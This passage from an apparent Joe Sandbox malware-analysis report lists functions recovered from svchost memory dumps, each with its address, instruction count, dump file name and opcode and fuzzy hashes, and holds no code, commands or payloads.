                                          • Instruction Fuzzy Hash: 80F1A472E00626DBCB58CE68C5A15BDFBF5AF45210B1A426DD856EB3C0D734EE41CB90
                                          Function 0365FDC0 Relevance: .4, Instructions: 390COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8010ce45e0ca5b65d77275f35b6bc2585a90d57dca97f7c3348b01d0fd3c1fd6
                                          • Instruction ID: a5d9c1cc6756645560d32020e50053c85bd54a0cb99d226ebeca0b9decb8939c
                                          • Opcode Fuzzy Hash: 8010ce45e0ca5b65d77275f35b6bc2585a90d57dca97f7c3348b01d0fd3c1fd6
                                          • Instruction Fuzzy Hash: 1CF19E74900609DFDB14DFA8C990AAEBBB4FF48314F2885A9E805AB345E735DE45CF90
                                          Function 03628397 Relevance: .4, Instructions: 380COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 97dcbc98dd073d32445dd83acc64614abdc571c4c56d133366cb7132bfb3e57b
                                          • Instruction ID: fc5695926bf62b9d70b73769767bef4fe7f839e459530ca2f36111d164f9f1ed
                                          • Opcode Fuzzy Hash: 97dcbc98dd073d32445dd83acc64614abdc571c4c56d133366cb7132bfb3e57b
                                          • Instruction Fuzzy Hash: 74D1D475A00B269BCF14DF64CD90ABEBBA5BF48304F0A862DE815DB280E734D951CF60
                                          Function 0365C6E0 Relevance: .4, Instructions: 367COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ee857fa14aabb1be21e19baf028e6706fa68c92290f976f78203a0ac7558595e
                                          • Instruction ID: 3b7e56ce361057f84eb1eda0137a8e6e57f663a650ececcc2bca19ba4394d633
                                          • Opcode Fuzzy Hash: ee857fa14aabb1be21e19baf028e6706fa68c92290f976f78203a0ac7558595e
                                          • Instruction Fuzzy Hash: 56D16D71E043198BEF28CE98C6847BDBBB5FB44304F18807AEC46AB394D7B58942DB45
                                          Function 036438E0 Relevance: .3, Instructions: 349COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 333c961a9cff4e48df7ab8e775c01a65bfe6ccee337e4c1d836dd67a6f2cbc31
                                          • Instruction ID: b207525476c52080fb5963b0f7b7b0a587839f7318416a3bd6bf9320df47fb20
                                          • Opcode Fuzzy Hash: 333c961a9cff4e48df7ab8e775c01a65bfe6ccee337e4c1d836dd67a6f2cbc31
                                          • Instruction Fuzzy Hash: ECE19E75A00205CFDB18CF58C980BAAB7F5FF58310F28819AE855EB391D734EA51CB90
                                          Function 0364CFE0 Relevance: .3, Instructions: 345COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 287cd1c4acbb309d98da8b721ef8c94e526c49b68e608b292af005a6315e051b
                                          • Instruction ID: 21494e1d54f3fa5a7f6f1bc991ab6dbec104cc975d0865bb23e5cb7f729d50f8
                                          • Opcode Fuzzy Hash: 287cd1c4acbb309d98da8b721ef8c94e526c49b68e608b292af005a6315e051b
                                          • Instruction Fuzzy Hash: 61D1A330E003299FEB25DF25C994BAAF7B5AB49704F0840EDD909AB342DB74AD85CF51
                                          Function 0363D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 405e4545d23e6fb1806599b31c255339c2895dcb403d3a20b6b260611907791c
                                          • Instruction ID: 81a68c6de8afb1d907fbccfbe3fa0bd8278a453d77ebdbbaf4a87c306e508e1d
                                          • Opcode Fuzzy Hash: 405e4545d23e6fb1806599b31c255339c2895dcb403d3a20b6b260611907791c
                                          • Instruction Fuzzy Hash: 23C19371E002159FEF25CF5AC940BAEFBB9EF55314F18826AD915AB390D770E942CB80
                                          Function 03640535 Relevance: .3, Instructions: 300COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                          • Instruction ID: 419b0005f14b0e3bf6aa7146815f086bd5a135973496a7311b4c7590387125fa
                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                          • Instruction Fuzzy Hash: 3BB11875A00655AFDF26DB68CA50BBEFBFAEF84200F190199D642DB381DB30D942CB50
                                          Function 036590DB Relevance: .3, Instructions: 287COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ceca652abe237944913a9097d39f7c91e3a77b9f3614988b18095d378dece6dd
                                          • Instruction ID: 4faea40c2820b22c5fcc7fac65593395a82cbd17494c5d58d54f318269d9e4d0
                                          • Opcode Fuzzy Hash: ceca652abe237944913a9097d39f7c91e3a77b9f3614988b18095d378dece6dd
                                          • Instruction Fuzzy Hash: B4A13B75900215AFEF12EFA4CC95BAE77B9EF46750F054068FA00AF2A0D7759C10CBA4
                                          Function 036383C0 Relevance: .3, Instructions: 281COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4221b2808ee087ba493f626103dd1ef2757fa7d8fe4cbc8f2c51a61941d6f1aa
                                          • Instruction ID: bdaff764204ba1014785d391d8eb2df08658de79e0794ff7b24941d0a5606772
                                          • Opcode Fuzzy Hash: 4221b2808ee087ba493f626103dd1ef2757fa7d8fe4cbc8f2c51a61941d6f1aa
                                          • Instruction Fuzzy Hash: 09C15874108341CFDB64CF15C584BAAB7E8FF89304F54496EE9898B391D774E909CB92
                                          Function 03670185 Relevance: .3, Instructions: 276COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 48bc216d829923493dd270a460af4106c0d14bddfc2769e2557a7001edde511e
                                          • Instruction ID: 2df9a3e8f7594e1d586e11595edcfc901b3f24a430b61e9a3bbf7f02362f5867
                                          • Opcode Fuzzy Hash: 48bc216d829923493dd270a460af4106c0d14bddfc2769e2557a7001edde511e
                                          • Instruction Fuzzy Hash: 28A1C275B0071ADBDB24DF69CA90BAAB7F5FF44314F544129EA059B381DB34E812CBA0
                                          Function 0364E3F0 Relevance: .3, Instructions: 261COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d180cd0e904b8d180ff9598c2c6c366115c1c5e119618fe4c662eb9b05f85a85
                                          • Instruction ID: e879bded4ebd538b1e04037936284470d3c8512bd5666b691589c0908e484ab7
                                          • Opcode Fuzzy Hash: d180cd0e904b8d180ff9598c2c6c366115c1c5e119618fe4c662eb9b05f85a85
                                          • Instruction Fuzzy Hash: 02914635E002118BEB28DB28D540B7EB7E9FF84714F1944AEE8059F340E736D842C761
                                          Function 03631131 Relevance: .3, Instructions: 259COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3cb5f7391e0fe50eabf392035cd150940a4dbb4700d0086fa58e00fd5f0cd7d9
                                          • Instruction ID: 41b5a84c715f62e2c60f16e53d6b9b55c0fc937b5ccf2a5d43878836a8fcd288
                                          • Opcode Fuzzy Hash: 3cb5f7391e0fe50eabf392035cd150940a4dbb4700d0086fa58e00fd5f0cd7d9
                                          • Instruction Fuzzy Hash: C2B11275A093408FD364DF28C580A5AFBF1BB89304F184A6EF899CB352D371E945CB96
                                          Function 03664750 Relevance: .3, Instructions: 251COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                          • Instruction ID: 94b9815d1a960a76b41378a3b9ce08b8e942fd6703b077cf29579abf751db6a8
                                          • Opcode Fuzzy Hash: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                          • Instruction Fuzzy Hash: 51815A35E047969FDB22CEADC9C026EBF55EF52280F2C467ED4428B341CA64DC86CB91
                                          Function 0367DBF9 Relevance: .2, Instructions: 244COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                          • Instruction ID: 58df7eb7d6f137e6ce696f83bdaef88c361c0be0a56c0375513600389175f6c5
                                          • Opcode Fuzzy Hash: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                          • Instruction Fuzzy Hash: 0E915E72620A06CFD725CF2DC985666FBE0FF55324BA88E18E4E6DB6A0D375E511CB00
                                          Function 036FF7B0 Relevance: .2, Instructions: 242COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 851202130379acd59c86d2f68b7f993cd87ff14a86f1856e471556738efef0cb
                                          • Instruction ID: b2694a7e9168e3df326d95bc7eb6a888cea653db386469314faa4d7e9f77148c
                                          • Opcode Fuzzy Hash: 851202130379acd59c86d2f68b7f993cd87ff14a86f1856e471556738efef0cb
                                          • Instruction Fuzzy Hash: A891C272E00206AFDB14CF28C9807AAB7F5AF48310F188578EA65DF395D775E951CB90
                                          Function 036FF43F Relevance: .2, Instructions: 241COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 13072db3191975d68780cf433e347c59b2cdd669a4a35afab76843672bf2aa3d
                                          • Instruction ID: 8c895e4c701944a022572da94e3412ea33d8353cd91f3ee3896ca8a23fc6b787
                                          • Opcode Fuzzy Hash: 13072db3191975d68780cf433e347c59b2cdd669a4a35afab76843672bf2aa3d
                                          • Instruction Fuzzy Hash: 4C91D172A105158FCB18CF69C8916BEBBF1FF88310F19C6A9D915EB39AD634D901CB50
                                          Function 036F81CC Relevance: .2, Instructions: 232COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8d610b0706af8bc4bb234ecae75c18eebaf8b7ba9ef6ff6dcbdc89237cefb721
                                          • Instruction ID: c0fc5958b7db9b03d3cbbb57b51655d97cb2fa284e41ec2f1ac4b3e7a019f1f3
                                          • Opcode Fuzzy Hash: 8d610b0706af8bc4bb234ecae75c18eebaf8b7ba9ef6ff6dcbdc89237cefb721
                                          • Instruction Fuzzy Hash: 8A81C572E006199FCB14CFA9C8805AEB7F5FF88314B1843AAD925E7384D774E952CB94
                                          Function 03640E59 Relevance: .2, Instructions: 231COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cfcd2fae845ed1753c7806fd0dc16dce7a1da570da8912fd9aadb3cc032d8098
                                          • Instruction ID: a9b8d2871385d72c6a5496616e51ea7ee9702001330006b557ef07782a2fa7ad
                                          • Opcode Fuzzy Hash: cfcd2fae845ed1753c7806fd0dc16dce7a1da570da8912fd9aadb3cc032d8098
                                          • Instruction Fuzzy Hash: EB81B531E00669DFDB54CF69C9809AEFBB6FFC5210B28C2A9E9159B345D730E941CB90
                                          Function 036EE4F6 Relevance: .2, Instructions: 224COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e6ecadc6af6f6564b5b88e0b27afa5f9d4c09e0bddbdddaaed5eaee11a3c3a22
                                          • Instruction ID: 624a3f2d23c98f74624a83d947d5b359e19f1fec3def24c56df4bd01eda65fcc
                                          • Opcode Fuzzy Hash: e6ecadc6af6f6564b5b88e0b27afa5f9d4c09e0bddbdddaaed5eaee11a3c3a22
                                          • Instruction Fuzzy Hash: A3819E76E012159BCB28CF98C5906ADFBF1EF88310F1981AED816EF384D7359941CB90
                                          Function 036FAB40 Relevance: .2, Instructions: 222COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                          • Instruction ID: ff22e22474763143547d60868f56b409364860c9c314972ca1ffb0ef42e0d7a7
                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                          • Instruction Fuzzy Hash: 09816E75A102099FCF18DF98C990AAEB7B6BF88314F18816DDA1A9B344D774E902CF54
                                          Function 0365D090 Relevance: .2, Instructions: 217COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                          • Instruction ID: f8037da70403c99489649c026d356e9af231e6c65b59dac8a39e5c8a44cbe037
                                          • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                          • Instruction Fuzzy Hash: 00818E76E001198BEF24CF58C9807AEFBB6FB84354F19816BD815BB384D6329A45CB91
                                          Function 0366E284 Relevance: .2, Instructions: 212COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e4a74121a11b51bcf66b1f26568438ee62395aabf247e2c0118dbd40dd1ac2c
                                          • Instruction ID: 1a67cb47911470719adf8e82fc76fc8aa272ef0936939d76771c26d0d59d1e21
                                          • Opcode Fuzzy Hash: 6e4a74121a11b51bcf66b1f26568438ee62395aabf247e2c0118dbd40dd1ac2c
                                          • Instruction Fuzzy Hash: 2C815E75A00609AFDB25CBA9C980AEAF7F9FB88384F14442DE555A7250D731AC05CB60
                                          Function 0365B950 Relevance: .2, Instructions: 209COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 27bd6665eebbe9252200d9d72294f3ae764312e555e2d07ab8564476d4949803
                                          • Instruction ID: 0ae3eea919f807434a1953d7e50e4b019f2c5b91369d1de5c44610cbfdf9a765
                                          • Opcode Fuzzy Hash: 27bd6665eebbe9252200d9d72294f3ae764312e555e2d07ab8564476d4949803
                                          • Instruction Fuzzy Hash: 5271C7346047509EEB24CE2ACA40736B7E5EB85714F18856EFC96CB2C4D7B6E806CB61
                                          Function 0364C640 Relevance: .2, Instructions: 206COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bb0f011c51619f7cec4628a63d1ee9c49a6d7f692afe9c6647173d1907d2e3c9
                                          • Instruction ID: d78069826596cbd17330e0451963b1a27972ff8b0ea2748a3b3424b81ec231b4
                                          • Opcode Fuzzy Hash: bb0f011c51619f7cec4628a63d1ee9c49a6d7f692afe9c6647173d1907d2e3c9
                                          • Instruction Fuzzy Hash: 5171CDB5C01265EFDB25CF59CA90BBEBBB8FF59700F14815AE842AB350D7749805CBA0
                                          Function 036EDAC6 Relevance: .2, Instructions: 202COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f88b33934a605b52a66c14ba0c71ba7898b6c83f9b7fbf8b8ec90a9ac055b007
                                          • Instruction ID: 8b854468e276c8476428b1a367887518a6f4f2a1eebc4c13a754978c32bc8bd1
                                          • Opcode Fuzzy Hash: f88b33934a605b52a66c14ba0c71ba7898b6c83f9b7fbf8b8ec90a9ac055b007
                                          • Instruction Fuzzy Hash: 0C819C70D01295DFCB24CF69C544AAAFBF8EF4AB40F048499E495AB385D374D84ADF50
                                          Function 036F70E9 Relevance: .2, Instructions: 201COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 639fef1e490ce4c2c61962a0b95768f5e26272217cca1204fc4e69a4cc9fcc53
                                          • Instruction ID: b003d8db531e16824c7676788ddca76f53365e4caca47227c4874edc23a3fbb0
                                          • Opcode Fuzzy Hash: 639fef1e490ce4c2c61962a0b95768f5e26272217cca1204fc4e69a4cc9fcc53
                                          • Instruction Fuzzy Hash: E061E675E0031AAFCB14EFA5C9909BFB779BF44250F18443DEA11AB340EB70DA458B94
                                          Function 0364260B Relevance: .2, Instructions: 201COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 208346eb7f87a7c0ecb17b14af5c3a2d18d29146cdc4b81340e45a65a3cf7c2b
                                          • Instruction ID: decb789639a239043cab116933174a021144745e51cb887863042d431e93a760
                                          • Opcode Fuzzy Hash: 208346eb7f87a7c0ecb17b14af5c3a2d18d29146cdc4b81340e45a65a3cf7c2b
                                          • Instruction Fuzzy Hash: 2971FE35A042419FC711DF28C594B2AB7E5FF88310F1989AAF898CF351DB38D846CB95
                                          Function 036EF0CC Relevance: .2, Instructions: 199COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 04a3d5c1e8e25ba7574f272d288289ceab5831dd468fb67ec5a26ee6a8e3bd48
                                          • Instruction ID: e2468e63476af102b0709065359b63408975719935c7a0752c0d06d3852affa6
                                          • Opcode Fuzzy Hash: 04a3d5c1e8e25ba7574f272d288289ceab5831dd468fb67ec5a26ee6a8e3bd48
                                          • Instruction Fuzzy Hash: F3719E79A02626DFCB24CF9AC18017AF7F1FF44704B6A846ED8829B340D774E949CB54
                                          Function 036B035C Relevance: .2, Instructions: 198COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                          • Instruction ID: 35b803e2ab36ec9705f0c9b3b70212a901829f2ee47b6f0d795e72b294d94cc6
                                          • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                          • Instruction Fuzzy Hash: BB716B75E00619EFCB10DFA9CA84AEEBBB8FF48700F144569E505AB250DB34EA41CF94
                                          Function 036C62A0 Relevance: .2, Instructions: 198COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 21bdefe6108605049e7dce725450c4a4b25fe5c7b578731b31581206d73de3d9
                                          • Instruction ID: d5c8f88d227f57253c383c21e2cc4e3cd425ba37781e207dfb3c8f7ea8e6b2f8
                                          • Opcode Fuzzy Hash: 21bdefe6108605049e7dce725450c4a4b25fe5c7b578731b31581206d73de3d9
                                          • Instruction Fuzzy Hash: D771E036210B41AFDB31DF14C954FAAB7F5EF44720F18892CE25A8B2A0D775E944CB68
                                          Function 036F7A46 Relevance: .2, Instructions: 193COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 68142294780f686403e4c1f7f1426f4e1bd83127541c79945fa94bdfc57a1e13
                                          • Instruction ID: ef162676e53af56f39261f11303c063ea0dfc95e5d7fade823796eb5625df1fc
                                          • Opcode Fuzzy Hash: 68142294780f686403e4c1f7f1426f4e1bd83127541c79945fa94bdfc57a1e13
                                          • Instruction Fuzzy Hash: 30513B75A002265FCB14DF69C9809BBB7F6EF89350B18416DEE54DB384DA74C902C7A0
                                          Function 036F132D Relevance: .2, Instructions: 188COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c91f650bbfc793c7a5bc2976267a9925a564d03caa64b514040a4e3b415c9ed5
                                          • Instruction ID: 15b7e737806495607a0bc157775fb08c7e72acf0169751ff5b7369b038bb5abb
                                          • Opcode Fuzzy Hash: c91f650bbfc793c7a5bc2976267a9925a564d03caa64b514040a4e3b415c9ed5
                                          • Instruction Fuzzy Hash: 49817E75A00205DFCB09CF99C590AAEBBF1FF89300F1981A9D859EB345D734EA41CBA0
                                          Function 036F903E Relevance: .2, Instructions: 186COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4331d8a31e5cb5cb2cc7cd155ea0b85705f69d271510c400e42f4e622ba6e5ac
                                          • Instruction ID: 461870715d29ca222a21e8ed430d8c9b956f787eb67ae72bde94843e4c71fe58
                                          • Opcode Fuzzy Hash: 4331d8a31e5cb5cb2cc7cd155ea0b85705f69d271510c400e42f4e622ba6e5ac
                                          • Instruction Fuzzy Hash: 6161CC75600715AFD325DF68C884BABBBE9FF88710F04462DFA698B240DB30E915CB95
                                          Function 00402500 Relevance: .2, Instructions: 184COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
